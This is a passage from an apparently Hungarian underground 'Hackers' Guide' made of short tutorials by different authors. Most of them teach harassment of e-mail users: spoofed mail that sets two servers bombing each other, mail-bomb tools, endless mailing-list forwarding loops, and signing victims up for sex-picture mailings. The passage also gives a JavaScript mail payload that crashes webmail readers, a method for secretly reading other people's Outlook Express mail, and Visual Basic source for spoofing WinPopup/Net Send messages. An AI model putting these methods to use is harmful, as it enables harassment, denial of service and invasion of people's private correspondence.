friendofsux.com-ra ami from:suckah@sux.com. Majd bekapcsolja a confirmation<br />
when arrived-ot. Tulajdonkeppen ennyi. Es a poen:<br />
Megerkezik friendofsux.com-ra a parszazezer uzenet, es friendofsux.com<br />
automatikusan kuldozgeti vissza sux.com-ra a confirmationokat hogy az uzenetek<br />
nagyon is jol megerkeztek:)))) Sz'al a ket rencer csak annyit fog realizalni hogy a<br />
masik bombazza ot, igy szepen egymasra uszitottuk oket vagy egyszeruen csak<br />
mexivattunk 2 rencert!:) Es ha ugyesek vagyunk akkor nem lesz ott az extended<br />
headerben hogy Origin:evil@attak.com, de ezt asszem mar ugyis tudjatok hogy hogy<br />
oldjuk meg nem en fogom leirni;)<br />
Ha nem vilagos leirom pontokban:<br />
1:<br />
user@attak.com:bash$ telnet sux.com 25<br />
--> spoofed mail kuldese (csak ugyesen, azert sem irom le hogy kell)<br />
--> spoofed hostrol celszeru telnetelni,<br />
--> az emailnek friendofsux.com-rol kell erkeznie,<br />
--> confirm when arrived = kulcsmozzanat<br />
2: vissza az 1-es ponthoz egy par ezerszer. Esetleg scriptet is lehet irni.<br />
3: Nezzuk szep tag szemekkel amint friendofsux.com rencergizdaja telefonalgat<br />
sux.com rencergizdajanak hogy mi a faszt kepzel az hogy emailbombazza ot es<br />
nagyon duhos. Ekkor sux.com megnezi hogy mi nincs rendben es realizalja, hogy<br />
tulajdonkeppen friendofsux.com vagy visszaadta az emailbombazast vagy nem<br />
realizalja csak azt latja hogy van egy par ezer uzenet es hogy irto lassu a login<br />
program:)) Egy legy ket csapasra, sot meg durvabb.<br />
Nade nem vagytok ti hulyek remelem ugyhogy nem is kell hogy tovabb reszletezzem<br />
biztos leesett a lenyeg, ugyhogy inkabb abba is hagyom. Ha nem veszitek komolyan<br />
akkor is jo poen szerintem:)) minimum rohogni lehet rajta.<br />
220
Hackers’ Guide<br />
Engem IRCNET-en a #danubius csatin lehet megtalalni de nem rewter nick alatt:<br />
publicba kezdd el keresni rewtert es egy ido utan megtalalod foleg kora estefele...;))))<br />
ReWtER<br />
E-mail: rewter@hotmail.com<br />
************************************************************************************************<br />
Levélbomba<br />
Először a levélbomba fogalma. A levélbomba annyit tesz, hogy egy megszerzett email<br />
címre akár több ezer haszontalan levelet küld v.ki. Pl. egy hircsoportban , IRC-n<br />
ICQ-n vagy sima emilben kellemetlenkedők ellen használják. A jobb progik pl:<br />
Kaboom3.0 (ez a legjobb levélbombázó) mindik változtatja a feladót a témát a<br />
levéltestet, így semmijen szűrővel nem lehet megállítani. Marad a kézi átnézés, vagy<br />
egész érkezett levelek kidobása persze a "JÓ" levelek elvesznek. Ráadásul a<br />
kaboom 3.x ennél is többet tud. Akár levelezőlistára is feliratja az áldozatot úgy, hogy<br />
nem tudja lemondani. (igazábol ő nincs feliratva csak egy másik cím ami neki<br />
továbbküldi (forwardolja)a levelet). A kaboom felsorol egy párat az amerikai buzis<br />
leszbikus listákbol csak beikszelni kell és megadni az áldozat emil címét.<br />
Legtöbbször a levelek az internetes kapcsolat alatt mennek ki. A Kaboom pl: sok<br />
klónt hoz létre és különböző levelező progiként tárgyal a szerverrel. Sőt olyan is van<br />
amelyik a szerver válaszát figyelemre se méltatva küldi a levelket. DE KÉTSZER IS<br />
GONDOLD MEG MIELŐTT ILYET CSINÁLSZ KÉRLEK!! Mert ha nem vagy<br />
elégóvatos rájöhetnek hogy te voltál. pl:ip cím stb.. Ha dtatic ip-d van (mindig<br />
ugyanaz) akkor könnyű a dolga az illetőnek, esetleg a szolgáltató letiltja a saját emil<br />
címedet ha bejelentést tesz.<br />
Dani12<br />
************************************************************************************************<br />
"Végtelenített" E-MAIL<br />
221
Hackers’ Guide<br />
Elôszôr is szükségünk lesz egy levelezôlistára. Ilyet bárki készíthet ingyen a<br />
WWW.LIST.TO címen. Miután átestünk néhány formaságon, ki kell választanunk<br />
néhány személyt, akit szeretnénk feliratni a listára. Ide majd két címet kell beírnunk -<br />
ezeket idôközben a WWW.INAME.COM-on tudjuk létrehozni. Ez utóbbi lapon E-<br />
MAIL továbbítást kérhetünk, azaz ha az ottani címre megérkezik egy levél, akkor azt<br />
autómatikusan továbbküldi a megadott helyre. Az elsô címen a lista címére kérjünk<br />
továbbítást (listaneve@list.to), a másodikon pedig a megbombázandó illetô E-MAILére.<br />
Az elöbbi azért kell, mert a listserver nem biztos hogy jónéven venné ha saját<br />
magának kellene leveleket küldözgetnie (persze lehet hogy nincs ezellen védve...),<br />
az utóbbi pedig azért, hogy az áldozat ne tudja lemondani a levelezôlistát - hiszen a<br />
listára tulajdonképpen ô nincsen feliratva, csupán egy másik cím, ami hozzá<br />
továbbítja a leveleket. Ettôl még persze egy hozzáértôbb illetô le tudja a listát<br />
mondani, de már addig is igen jelentôs számú levelet kap... Ezzel tehát meg is<br />
volnánk. Mi fog történni? Amint a lista elkészül, értesítést kapnak a feliratottak a<br />
létrejöttérôl. Ezt megkapja az áldozat, továbbá megkapja a másik cím is, ami<br />
továbbítja a neki megadott címre. Ez a cím történetesen a levelezôlistáé, aki kiküldi<br />
ezt is a megbombázottnak, s értesíti a rá forwardoló címet arról, hogy megkapta az<br />
üzenetet. Ez a levél utána ismét eljut hozzá, ô kiküldi az illetékeseknek, s megintcsak<br />
küld egy leigazolást - tulajdonképpen saját magának. Ezzel egy végtelen lavinát<br />
indítottunk el, aminek csak a server gazdája szabhat gátat... Gyakorlatilag - a lassú<br />
sebesség miatt - úgy fest a helyzet, hogy 10 percenként kap egy E-MAIL-t a károsult<br />
- kivéve abban az (igen valószínű)esetben, ha a servernek nem tetszik a művünk,<br />
és...<br />
************************************************************************************************<br />
A legegyszerûbb módszer levélbombázáshoz<br />
Ez az egészet, nem azért írom le, hogy másoknak fegyvert adjak a kezébe, hanem<br />
azért, hogy felhívjam a figyelmet az egyes levelezorendszerekben lévo bugokra...<br />
Összedobta: Nestan<br />
1. Egészrol röviden, tömören...<br />
Szóval erre az egészre nem én jöttem rá, hanem az egyik barátom, aki felhívta rá a<br />
figyelmemet. Az egész szituáció onnan kezdodik, hogy adva vagyon egy lassú<br />
internet hozzáférés(a'la Elender) és szeretnénk a beregisztrált Freemail-es<br />
postafiókunkból webes felületen keresztül levelet küldeni valakinek. Ha arra a<br />
'KÜLDÉS' gombra többször és többször, egymás után rákattintunk megállás nélkül<br />
illetve a felso 'TO/CÍMZETT' illetve 'CC' mezokbe ugyanazt az e-mail címet beírjuk,<br />
akkor az illeto annyiszor 2 példányt kap, ahányszor rákattintottunk a 'KÜLDÉS'<br />
222
Hackers’ Guide<br />
gombra... Tehát ennyi... Ez a legegyszerubb, amihez free SMTP szervereket illetve<br />
hasonló mások számára bonyolult beállítást nem kell eszközölni...<br />
************************************************************************************************<br />
A Freemailrol ugy altalaban<br />
FreeMail.hu-ról úgy általában<br />
Egyik nap éppen otthon voltam betegen :[ , amikor a www.freemail.hu ingyenes<br />
levelezõ rendszer FaQ-jét olvasgattam...<br />
Elsõre ez szúrt szemet:<br />
"Központi spam szûrés<br />
A beérkezõ tömeges, kéretlen leveleket igyekszünk automatikusan kiszûrni az erre a<br />
célra létrejött, az ilyen levelek feladóit és továbbítóit szûrõ rendszerekhez<br />
csatlakozva."<br />
hát ez sux! :[ de ne csüggedjetek! ;] (modjuk a mailbombot en ugyanugy tuttam<br />
hasznalni, mint regebben, na de mindegy!)...<br />
Mondjuk van egy uj modszer bombazasra! :] (csak egy telnet app és a haverod eamil<br />
cime kell!) Ezt is a FaQ-ban talaltam:<br />
"Hol találom meg ennek a FAQ-nak a legfrissebb verzióját?<br />
Email-ben lekérhetõ egy a freemail-faq@c3.hu címre küldött tetszõleges tartalmú<br />
levéllel. (A szerver ezt követõen automatikusan elküldi a feladó címére a szöveget.)"<br />
ugye kapizsgáljátok! :] ha nem az sem baj leírom: szóval remélem mindenki tud<br />
anonymmailt küldeni telnettel... (ha nem olvassatok utana, most nem írom le). Szóval<br />
a feladóhoz a célpont mail címét írod, és már kapja is a szép méretû filét, ezt csinald<br />
meg kb 10x és kellemes lessz! Bátrabbaknak: küldjél mailbombot a a faq címere a<br />
célpontod címével ellátva! :]<br />
Aztán mégvalami! (ez a legjobb :]):<br />
"Új olvasó felület<br />
Ezentúl összetett, például HTML kódolást tartalmazó levelek is megjeleníthetõk a<br />
webes felületen, azaz látszanak a színek, kiemelések, a szövegben elhelyezett<br />
képek. A levélben szereplõ email címek és URL-ek klikkelhetõek lettek. Javítottuk az<br />
attachmentek kezelését is."<br />
ql, aki olvasta az internettorol szolo cikkem az szerintem már kezdi is irni a levelet ;] ,<br />
na, de aki nem annaki itt a meglepetés...<br />
223
Hackers’ Guide<br />
Szoval, ha a levélbe fogod és beirsz egy ilyen sort: Hi Akkor ez szép pirosan fog megjelenni! Nos ez alapban semmi,<br />
de igy a java-s cuccok is lefutnak :]<br />
Mondjuk ezt írod a levéltõrzsbe:<br />
setTimeout("top.location.href =<br />
'/con/con'",100);<br />
nos ugye javaban mindenki otthon van?? ;]<br />
Megjegyzés: ez csak akkor mükszik, ha a haverod a webes felületrõl vagy olyan<br />
levprogival nézi a leveleit ami futtatja a html kodot!<br />
Hát ennyi mára tényleg ne szivassátok a freemail levlistáit csak a haverjaitokat ;]<br />
bY: DomIni$<br />
mailto: root@rulezlinux.com<br />
www.rulezlinux.com<br />
#silver<br />
************************************************************************************************<br />
Szex kepek e-mailre<br />
Mint tudjuk a www.extra.hu cimen ha regisztraltatjuk magunkat, akkor egy olyan email<br />
cimet kapunk, ami a megadott cimre forwardolja a a leveleket. Ugye ide<br />
barmilyen cim beirhato, senki nem fogja ellenorizni. Tehat ide barki cimet beirhatjuk,<br />
es akkor az az illeto fogja kapni a leveleket, akinek a cimet beirtuk. Tehat ha az<br />
extras cimet feliratjuk nehany listara, vagy valahova mashova, akkor tenylegesen az<br />
extra cimre fogjak kuldeni a leveleket, amit mi hoztunk letre, de vki mas kapja meg.<br />
Es a feliratott egyen nem fog rola tudomast szerezni. De persze ezt el lehet jatszani<br />
mas e-mail tovabbitoval is. Csak gondoltam ez magyar, marmint az extra, es aranyait<br />
veve egesz gyors.<br />
Na szoval a lenyegre terve.<br />
Vannak a neten olyan cimek, ahonnan e-mailre szex kepeket lehet kerni. Eloszor<br />
amikor ez extranal regisztraltatod magad, akkor egy sajat e-mailt adj meg. Majd nezz<br />
el a www.sexfiles.com vagy a www.free-sex-pics.cx cimre es irsad fel magad. Majd<br />
ezutan ezek kuldenek neked egy levelet, a szokasos szoveggel, hogy amennyiben te<br />
irattad fel magad, kuld vissza a levelet egy bizonyos idon belul. Ezutan ezt<br />
visszakuldod, es a kovetkezo lepesben az extraban megvaltoztatod az e-mail cimet.<br />
Tehat egy olyan cimet irsz be, akinek meglepit akarsz okozni ezzel. Es hogy mi fog<br />
tortenni? Naponta 10 db szex kepet fog kapni a postafiokjaba. Es ugye mivel egy<br />
leveltovabbitoval van dolga, nem egyszeru ezt lemondani.<br />
Egy darabig talan jo bulinak tunik, de mikor mar egy fel eve minden nap kap az<br />
224
ember kepeket, egy kicsit idegesito lehet, foleg ha nem is ingyenes e-mail<br />
szolgaltatonal van ez a cim. >:-)<br />
Hackers’ Guide<br />
Cyberfly<br />
************************************************************************************************<br />
Levélbomba törlése<br />
Telnetelj be a mail szolgáltatód serverére a 110-es porton! Ezután azonosítsd<br />
magad:<br />
USER [felhasználóneved]<br />
PASS [jelszavad]<br />
Ezután a DELE [levél száma] parancs segítségével törölheted a leveleket letöltésük<br />
nélkül.<br />
************************************************************************************************<br />
Outlook Express levelek<br />
Elfelejtetted az OutLook Express jelszavad? El akarod olvasni mások leveleit, de<br />
nem tudod a jelszavukat? A megoldás nagyon egyszeru, hiába kér az OE jelszót a<br />
profilhoz, a leveleket mégis kódolatlanul tárolja a<br />
c:\ windows\ Applications Data\ Identities\ {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\<br />
Microsoft\ Outlook Express<br />
vagy ha "több felhasználós" windowsod van, akkor a<br />
c:\ windows\ Profile\ username\ Applications Data\ Identities\ {xxxxxxxx-xxxx-xxxxxxxx-xxxxxxxxxxxx}\<br />
Microsoft\ Outlook Express<br />
mappában, szintén valami spéci formában, *.dbx fájlokban.<br />
Van pár ilyen mappa, legegyszerübben úgy lehet megtalálni az igazit, hogy<br />
belekukkantasz a *.dbx fájlokba, és rákeresel egyszerubb szavakra (pl. Szia, Bye,<br />
Uvd, vagy az illeto neve, e-mail címe), mert a leveleket sima szövegként tárolja a<br />
OE, kiegészítve valami bináris formában lévo egyéb adatokkal.<br />
Ha a beállításoknál a tömörítés opció be van kapcsolva - és az OE tényleg betömöríti<br />
a leveleket - akkor az elozo módszer értelmét veszti.<br />
225
Hackers’ Guide<br />
Ezekek a fájlokat egy egyszeru szövegszerkesztovel is meg lehet nézni, de a levelek<br />
elolvasásához simán fel lehet használni az Outlook-ot is, csak létre kell hozni egy új<br />
profilt, és átállítani a régi mappára az<br />
eszközök/Beállítsáok/Karbantartás/Tárolómappa fülön a könyvtárat, majd újraindítani<br />
az OE-t. Aztán, ha beállítasz rá egy jelszót, akkor észrevétlenül nyomon követheted<br />
mások levelezését, illetve sajátodat ott folytathatod, ahol abbahagytad.<br />
Sun-Zero<br />
sun-zero@freemail.hu<br />
************************************************************************************************<br />
Outlook Express 5 bug<br />
Ez a cikk fordítás, az eredeti cikket írta: cube -cube@boxnetwork.net<br />
Windows alatt az Outlook Express 5.x engedélyezi az utólag megnyitott üzenetek<br />
olvasását miután egy másik üzenet meg lett nyitva. Egy speciális levél küldése által a<br />
távoli támadó lekérdezheti az aktuálisan megnyitott üzeneteidet, ezzel fontos<br />
információkat megszerezve. A probléma megállapítani az e-mail tárgyát, ami változó<br />
egy újonnan megnyitott ablakban. Ezen a változón keresztül valószínuleg hozzá<br />
tudsz férni az összes megnyitott üzenethez.<br />
Az exploit:out-exp.htm.txt<br />
Scalpal<br />
************************************************************************************************<br />
WinPopup és NetSend üzenetek álcázása<br />
Az anyag fordítás, eredeti cím/szerzo: "Hack-FAQ " /Wang/<br />
FordÍtotta: Sun-Zero /sun-zero@freemail.hu/<br />
Ha van hozzáférésed egy LAN-hoz (Local Area Network - helyi hálózat) a<br />
munkahelyeden, vagy iskolában, kollégiumban, akkor a windows 95/98-as gépeken<br />
igen valószínü hogy winpopuppal üzengetnek a hálózaton. Ha a LAN, amihez<br />
hozzáfér használ windows NT-s gépeket akkor valószínuleg a winpopuppal<br />
egyenértéku program a Net Send vagy Messenger szolgáltatás.<br />
226
Hackers’ Guide<br />
A winpopup és a netsend, egyaránt üzenetközvetíto szolgáltatás a hálózatokon.<br />
Az a gondolat aljas, hogy képes vagy belépni más login nevén vagy számítógépén<br />
és ezután (feltéve hogy nekik is szintén nyitva van a program) küldsz másoknak<br />
olyan rövid üzenetet, amilyet akarsz, és utána az látszik a képernyojükön.<br />
Alapjábavéve, nevetséges, amikor oda-vissza küldözgetünk hülye üzeneteket a<br />
barátainknak.<br />
Amikor az üzenet megérkezik, akkor a géped neve látszik a feladónál. Ha te üzenetet<br />
küldesz hackelésrol, vagy más veszélyes témáról igen valószínü hogy a<br />
rendszergazda késobb megnézi, vagy szorgalmasan figyeli az üzeneteket. Ezért<br />
lenne jó tudni hogy hogyan lehet hamis üzenetet küldeni, hogy úgy látszódjon, hogy<br />
mástól származik, vagy a "feladó" nem is létezik.<br />
Mindketto, a winpopup.exe (többnyire a c:\windows könyvtárban van) és a Net Send<br />
(nem biztos a helye NT alatt - keresd meg, nyilvánvalóan a "NET SEND<br />
számítógépnév üzenet" paranccsal muködik) is ugyanolyan a protokollt használ -<br />
"Mailslots"-t.<br />
Itt van egy Visual Basic forráskód az üzenetek hamisításához. Neked kell csinálni<br />
egy form-ot (Form1) amiben benne vannak a következok:<br />
• Text box called "Text1"<br />
• Text box called "Text2"<br />
• Text box called "Text3"<br />
• Command Button called "Command1"<br />
Const MAILSLOT_WAIT_FOREVER = (-1)<br />
Const OPEN_EXISTING = 3<br />
Const GENERIC_READ = &H80000000<br />
Const GENERIC_WRITE = &H40000000<br />
Const GENERIC_EXECUTE = &H20000000<br />
Const GENERIC_ALL = &H10000000<br />
Const INVALID_HANDLE_VALUE = -1<br />
Const FILE_SHARE_READ = &H1<br />
Const FILE_SHARE_WRITE = &H2<br />
Const FILE_ATTRIBUTE_NORMAL = &H80<br />
Private Declare Function CloseHandle Lib "kernel32" (ByVal hHandle As Long) As<br />
Long<br />
Private Declare Function WriteFile Lib "kernel32" (ByVal hFileName As Long, ByVal<br />
lpBuff As Any, ByVal nNrBytesToWrite As Long, lpNrOfBytesWritten As Long, ByVal<br />
lpOverlapped As Long) As Long<br />
Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal<br />
lpFileName As String, ByVal dwAccess As Long, ByVal dwShare As Long, ByVal<br />
lpSecurityAttrib As Long, ByVal dwCreationDisp As Long, ByVal dwAttributes As<br />
Long, ByVal hTemplateFile As Long) As Long<br />
Private Sub Command1_Click()<br />
SendMsg(Text1.Text, Text2.Text, Text3.Text)<br />
227
Hackers’ Guide<br />
End Sub<br />
Function SendMsg(From As String, To As String, Text As String) As Long<br />
Dim rc As Long<br />
Dim mshandle As Long<br />
Dim msgtxt As String<br />
Dim byteswritten As Long<br />
Dim mailslotname As String<br />
' name of the mailslot<br />
mailslotname = "\\" + To + "\mailslot\messngr"<br />
msgtxt = From + Chr(0) + To + Chr(0) + Text + Chr(0)<br />
mshandle = CreateFile(mailslotname, GENERIC_WRITE, FILE_SHARE_READ, 0,<br />
OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, -1)<br />
rc = WriteFile(mshandle, msgtxt, Len(msgtxt), byteswritten, 0)<br />
rc = CloseHandle(mshandle)<br />
End Function<br />
'----------------------------- END OF CODE -------------------------------------<br />
A program használata:<br />
• Fordítsd le .exe-nek<br />
• Futtasd<br />
• "Text1" helyére írd be az üzenet feladóját, ide bármit beírhatsz.<br />
• "Text2" helyére írd be az üzenet címzettjét (bármelyik számítógép neve, vagy<br />
bármelyik login név)<br />
• "Text3" helyére írd be az üzenetet<br />
• Nyomd meg a Command1 gombot az üzenet elküldéséhez.<br />
Biztos vagyok benne, el tudsz gondolkodni a program saját használatodra való<br />
fordításához. (Ugyanis a programban van egy-két kisebb hiba - Sun-Zero)<br />
End of Volume #1<br />
228